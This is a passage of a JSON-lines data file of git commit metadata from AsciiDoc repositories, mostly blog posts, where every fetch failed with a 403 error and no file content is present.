2015-01-31-Useful-Rails-Helper-part2.adoc","repos":"rubyinhell\/hubpress.io,rubyinhell\/hubpress.io,rubyinhell\/hubpress.io,rubyinhell\/hubpress.io","old_file":"_posts\/2015-01-31-Useful-Rails-Helper-part2.adoc","new_file":"_posts\/2015-01-31-Useful-Rails-Helper-part2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rubyinhell\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1ca47270aa6e0b347b2a04dce4e59cbccc130ae","subject":"Update 2016-12-14-Hello-world.adoc","message":"Update 2016-12-14-Hello-world.adoc","repos":"moonPress\/press.io,moonPress\/press.io,moonPress\/press.io,moonPress\/press.io","old_file":"_posts\/2016-12-14-Hello-world.adoc","new_file":"_posts\/2016-12-14-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moonPress\/press.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f984fba9f1fdd63f6e40a4e9e026f658edc68adb","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f90c51039a255b6fd50e6e150f693e20300ae2f6","subject":"Update 2017-10-19-Hello-World.adoc","message":"Update 2017-10-19-Hello-World.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-19-Hello-World.adoc","new_file":"_posts\/2017-10-19-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adfda2a13b70d757c294817e811f9b39c9cc5bc6","subject":"y2b create post V-MODA Crossfade M-80 Headphones Unboxing \\u0026 Overview","message":"y2b create post V-MODA Crossfade M-80 Headphones Unboxing \\u0026 
Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-09-VMODA-Crossfade-M80-Headphones-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-05-09-VMODA-Crossfade-M80-Headphones-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d39b4a15f0b82a0bdb73fc089fba21b1772e24a2","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"559e9c585edb4a1066c6e5b2682581f7688fd56e","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2e27c4d302a26fc4b9eb2225866914eb9ea355d","subject":"Update 2016-02-21-Django-Learning.adoc","message":"Update 2016-02-21-Django-Learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-02-21-Django-Learning.adoc","new_file":"_posts\/2016-02-21-Django-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8043e31552298d5ce32695f7cfa9890a1ac0e79","subject":"Update 2016-11-22-Tuesday-Morning.adoc","message":"Update 2016-11-22-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-22-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-22-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8c75077c460acc66f88b1b710d247b5815a2c88","subject":"Add a few more badges","message":"Add a few more badges\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c86af2eb997a14994dd240e23b4b9c09dea407e6","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f3995c6897dc2a4723915c9bcb2d196bb19f667","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b83b2b0c92e4251843c432cda12a7ff82ff2496e","subject":"Update 2015-06-11-Cousteau-61115.adoc","message":"Update 2015-06-11-Cousteau-61115.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-11-Cousteau-61115.adoc","new_file":"_posts\/2015-06-11-Cousteau-61115.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9a407a48276e4cfc2c5848711c9bcd341eb508f","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78a0a53bb4baf3d3389f5711f7d621b0610e9db2","subject":"Update 2015-06-01-Es-geht-weiter.adoc","message":"Update 2015-06-01-Es-geht-weiter.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-01-Es-geht-weiter.adoc","new_file":"_posts\/2015-06-01-Es-geht-weiter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2e6cd1ff0aa23ee93ac0f34d8010982729ca372","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 
2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5fe63ef2aa2d2ba248cae72598ef2d472279796","subject":"y2b create post GTA V Special Edition, RC Spider \\u0026 More (Deal Therapy)","message":"y2b create post GTA V Special Edition, RC Spider \\u0026 More (Deal Therapy)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-09-GTA-V-Special-Edition-RC-Spider-u0026-More-Deal-Therapy.adoc","new_file":"_posts\/2013-07-09-GTA-V-Special-Edition-RC-Spider-u0026-More-Deal-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12c779a22b9d3faa21afc5d85abfb08684d65209","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa1878ad972fd9fe516a0bc2d76f56fe12cbf50d","subject":"Initial dbsupport documentation","message":"Initial dbsupport documentation\n\n[ci skip]\n","repos":"barspi\/jPOS-EE,jrfinc\/jPOS-EE,jpos\/jPOS-EE,jrfinc\/jPOS-EE,barspi\/jPOS-EE,jpos\/jPOS-EE,jpos\/jPOS-EE,barspi\/jPOS-EE,jrfinc\/jPOS-EE","old_file":"doc\/src\/asciidoc\/module_dbsupport.adoc","new_file":"doc\/src\/asciidoc\/module_dbsupport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrfinc\/jPOS-EE.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b1e7534c70373460664f950a4286334836b1a6af","subject":"Publish 2095-1-1-Puzzle-6-Hackipedia.adoc","message":"Publish 2095-1-1-Puzzle-6-Hackipedia.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2095-1-1-Puzzle-6-Hackipedia.adoc","new_file":"2095-1-1-Puzzle-6-Hackipedia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5dac69d66a9dedb8741adc33dd6d1ee591670ad","subject":"Update 2016-07-15-Testing-Getting-closer.adoc","message":"Update 
2016-07-15-Testing-Getting-closer.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-07-15-Testing-Getting-closer.adoc","new_file":"_posts\/2016-07-15-Testing-Getting-closer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7af87d4260e9f36dbb60e935c7d02dfa4bdf68e","subject":"Update 2014-09-28-HateStack-The-self-deleting-rantbin.adoc","message":"Update 2014-09-28-HateStack-The-self-deleting-rantbin.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-28-HateStack-The-self-deleting-rantbin.adoc","new_file":"_posts\/2014-09-28-HateStack-The-self-deleting-rantbin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b3ae038258dfc6fcc2e161523969d06fe9a8c2a","subject":"Update 2016-11-19-Second-blog.adoc","message":"Update 2016-11-19-Second-blog.adoc","repos":"yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io","old_file":"_posts\/2016-11-19-Second-blog.adoc","new_file":"_posts\/2016-11-19-Second-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yuyudhan\/yuyudhan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8d6bbd885de4c822ee3fb0f2fafd0647e8c6b35","subject":"Update 2017-05-25-Hello-World.adoc","message":"Update 2017-05-25-Hello-World.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-25-Hello-World.adoc","new_file":"_posts\/2017-05-25-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02e42d3b5ebe8ca7bcd408a2e25c825651c8bfc2","subject":"added snoop-boot readme","message":"added snoop-boot readme\n","repos":"ivargrimstad\/snoopee,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoopee","old_file":"snoop-boot\/README.adoc","new_file":"snoop-boot\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b892ccaf2e7f3f9fde879ca20e49175ded1d518","subject":"Update 2016-02-28-.adoc","message":"Update 2016-02-28-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-02-28-.adoc","new_file":"_posts\/2016-02-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0a7997c0f07c56f57ac0c2049b7db80fb40ab20","subject":"Update 2017-10-20-vendanoapp.adoc","message":"Update 
2017-10-20-vendanoapp.adoc","repos":"vendanoapp\/vendanoapp.github.io,vendanoapp\/vendanoapp.github.io,vendanoapp\/vendanoapp.github.io,vendanoapp\/vendanoapp.github.io","old_file":"_posts\/2017-10-20-vendanoapp.adoc","new_file":"_posts\/2017-10-20-vendanoapp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vendanoapp\/vendanoapp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11928d8a9b0d5251a79e8765f4b53c64bd3fce8e","subject":"Update 2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc","message":"Update 2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc","new_file":"_posts\/2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1372a41addbcc43af1aca3b772931c7c9dcefc55","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59d6ca310865b863a7cd51339483f773df2dd118","subject":"Add block_pass example","message":"Add block_pass example\n","repos":"asciidoctor\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest,asciidoctor\/asciidoctor-doctest","old_file":"data\/examples\/asciidoc\/block_pass.adoc","new_file":"data\/examples\/asciidoc\/block_pass.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahmanusta\/asciidoctor-doctest.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f29771feebe73ceb3bcb1e8c0e4ac081b9283197","subject":"add blog","message":"add blog\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/06\/04\/deref.adoc","new_file":"content\/news\/2021\/06\/04\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a712454482dafe8abcaca05f197748cfa9b6edb0","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/09\/24\/deref.adoc","new_file":"content\/news\/2021\/09\/24\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c5ea2fdbd4a91f1f7c881c074639743c674ecd7b","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 
2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a6344c81d040ab2e0cecebdb7dd29b4b51b7899","subject":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","message":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02823ebdd2698184fbf29c4f03c97b6805cd7281","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"800d23f7a6e231010bf96fa219cc6e9ae7f84cc1","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f80790b728db8414b2c2a86a69bec320a42e69e9","subject":"Delete the file at '_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","message":"Delete the file at '_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c8615f1e5da533f9b3867137ac6ffde602b091d","subject":"Blog about inventory 0.15.0.Final release.","message":"Blog about inventory 0.15.0.Final 
release.\n","repos":"pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/04\/27\/hawkular-inventory-0.15.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/04\/27\/hawkular-inventory-0.15.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee099c680c99ec4b71d059336d47e78acee8b0cb","subject":"Update 2017-07-22-Bechmarking-HIP-Cffe.adoc","message":"Update 2017-07-22-Bechmarking-HIP-Cffe.adoc","repos":"itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io","old_file":"_posts\/2017-07-22-Bechmarking-HIP-Cffe.adoc","new_file":"_posts\/2017-07-22-Bechmarking-HIP-Cffe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsnarsi\/itsnarsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97301378faad763b6b7df3ef5ec140f63a9a888","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b5bd8ac81cfa7039f5caaf662f5114b401c2508","subject":"Issue #4 Renamed macro-processes to processes","message":"Issue #4 Renamed macro-processes to processes\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3880f717e21fec356927ec78199d702b692575ad","subject":"Create README.adoc","message":"Create 
README.adoc","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"examples\/example_udp_echo\/README.adoc","new_file":"examples\/example_udp_echo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22807fcb41c30043d868893422510b66f29270c7","subject":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","message":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da119eda0788e24a1b481272cd09f63affe0485e","subject":"Update 2015-12-01-How-to-flash-a-target-board-using-a-function-provision-on-Brillo.adoc","message":"Update 2015-12-01-How-to-flash-a-target-board-using-a-function-provision-on-Brillo.adoc","repos":"geummo\/geummo.github.io,geummo\/geummo.github.io,geummo\/geummo.github.io","old_file":"_posts\/2015-12-01-How-to-flash-a-target-board-using-a-function-provision-on-Brillo.adoc","new_file":"_posts\/2015-12-01-How-to-flash-a-target-board-using-a-function-provision-on-Brillo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/geummo\/geummo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffd62df2aa7e3ee07d28ec575023c49f55a03ebe","subject":"Update 2016-05-26-Such-as-the-story-of-when-he-turned-into-https-of-Wordpress-site.adoc","message":"Update 